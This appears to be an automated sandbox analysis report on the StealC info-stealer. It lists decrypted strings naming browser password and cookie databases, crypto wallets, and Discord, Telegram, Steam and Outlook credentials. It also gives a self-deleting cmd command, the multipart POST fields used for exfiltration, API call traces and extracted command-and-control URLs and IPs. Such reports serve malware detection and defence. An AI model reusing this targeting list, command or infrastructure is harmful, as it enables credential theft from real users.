Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Web Data
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: History
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: logins.json
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: formSubmitURL
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: usernameField
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: encryptedUsername
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: encryptedPassword
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: guid
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: cookies.sqlite
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: formhistory.sqlite
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: places.sqlite
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: plugins
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Local Extension Settings
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Sync Extension Settings
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: IndexedDB
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Opera Stable
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Opera GX Stable
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: CURRENT
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: chrome-extension_
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Local State
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: profiles.ini
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: chrome
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: opera
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: firefox
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: wallets
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %08lX%04lX%lu
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ProductName
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: x32
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: x64
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ProcessorNameString
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: DisplayName
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: DisplayVersion
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Network Info:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - IP: IP?
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Country: ISO?
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: System Summary:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - HWID:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - OS:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Architecture:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - UserName:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Computer Name:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Local Time:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - UTC:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Language:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Keyboards:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Laptop:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Running Path:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - CPU:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Threads:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Cores:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - RAM:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - Display Resolution:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: - GPU:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: User Agents:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Installed Apps:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: All Users:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Current User:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Process List:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: system_info.txt
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: freebl3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: mozglue.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: msvcp140.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: nss3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: softokn3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: vcruntime140.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \Temp\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: .exe
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: runas
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: open
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: /c start
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %DESKTOP%
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %APPDATA%
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %USERPROFILE%
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %DOCUMENTS%
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %PROGRAMFILES%
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: %RECENT%
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: *.lnk
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: files
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \discord\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \Local Storage\leveldb
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \Telegram Desktop\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: key_datas
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: map*
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: F8806DD0C461824F*
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Telegram
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Tox
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: *.tox
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: *.ini
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Password
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 00000001
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 00000002
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 00000003
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: 00000004
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Pidgin
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \.purple\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: accounts.xml
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: token:
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Software\Valve\Steam
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: SteamPath
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \config\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ssfn*
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: config.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: DialogConfig.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: libraryfolders.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: loginusers.vdf
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \Steam\
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: sqlite3.dll
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: browsers
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: done
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: soft
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: \Discord\tokens.txt
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: https
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: POST
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: HTTP/1.1
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: hwid
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: build
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: token
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: file_name
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: file
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: message
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 17.2.stealc_default2.exe.770000.0.unpack String decryptor: screenshot.jpg
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00779B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 17_2_00779B60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA, 17_2_0077C820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00777240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 17_2_00777240
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00779AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 17_2_00779AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00788EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 17_2_00788EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8DA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 17_2_6C8DA9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8D44C0 PK11_PubEncrypt, 17_2_6C8D44C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8A4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 17_2_6C8A4420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8D4440 PK11_PrivDecrypt, 17_2_6C8D4440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9225B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 17_2_6C9225B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8BE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 17_2_6C8BE6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8DA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 17_2_6C8DA650
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8B8670 PK11_ExportEncryptedPrivKeyInfo, 17_2_6C8B8670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8FA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 17_2_6C8FA730
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C900180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 17_2_6C900180
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8D43B0 PK11_PubEncryptPKCS1,PR_SetError, 17_2_6C8D43B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8F7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 17_2_6C8F7C00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8FBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 17_2_6C8FBD30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8B7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 17_2_6C8B7D60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8F9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 17_2_6C8F9EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8D3FF0 PK11_PrivDecryptPKCS1, 17_2_6C8D3FF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8D9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 17_2_6C8D9840
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8D3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 17_2_6C8D3850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8FDA40 SEC_PKCS7ContentIsEncrypted, 17_2_6C8FDA40
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_97afe801-3
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 17_2_0077E430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00784910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_00784910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 17_2_0077BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_007716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_007716D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_0077F6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00783EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 17_2_00783EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 17_2_0077DA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_007838B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 17_2_007838B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00784570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 17_2_00784570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 17_2_0077ED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_0077DE10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior

Networking

barindex
Source: Malware configuration extractor URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor URLs: computeryrati.site
Source: Malware configuration extractor URLs: faulteyotk.site
Source: Malware configuration extractor URLs: contemteny.site
Source: Malware configuration extractor URLs: authorisev.site
Source: Malware configuration extractor URLs: servicedny.site
Source: Malware configuration extractor URLs: goalyfeastz.site
Source: Malware configuration extractor URLs: opposezmny.site
Source: Malware configuration extractor URLs: seallysl.site
Source: Malware configuration extractor URLs: dilemmadu.site
Source: Malware configuration extractor URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor IPs: 185.215.113.16
Source: Malware configuration extractor URLs: sevjoi17sr.top
Source: Malware configuration extractor URLs: home.sevjoi17sr.top
Source: Malware configuration extractor URLs: 0/80/home.sevjoi17sr.top
Source: Joe Sandbox View IP Address: 1.1.1.1 1.1.1.1
Source: Joe Sandbox View IP Address: 20.101.57.9 20.101.57.9
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_007760A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle, 17_2_007760A0
Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.c equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002B.00000003.2307590249.00002B3C00624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761183199.00002B3C0063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760490321.00002B3C0050D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: captcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https equals www.youtube.com (Youtube)
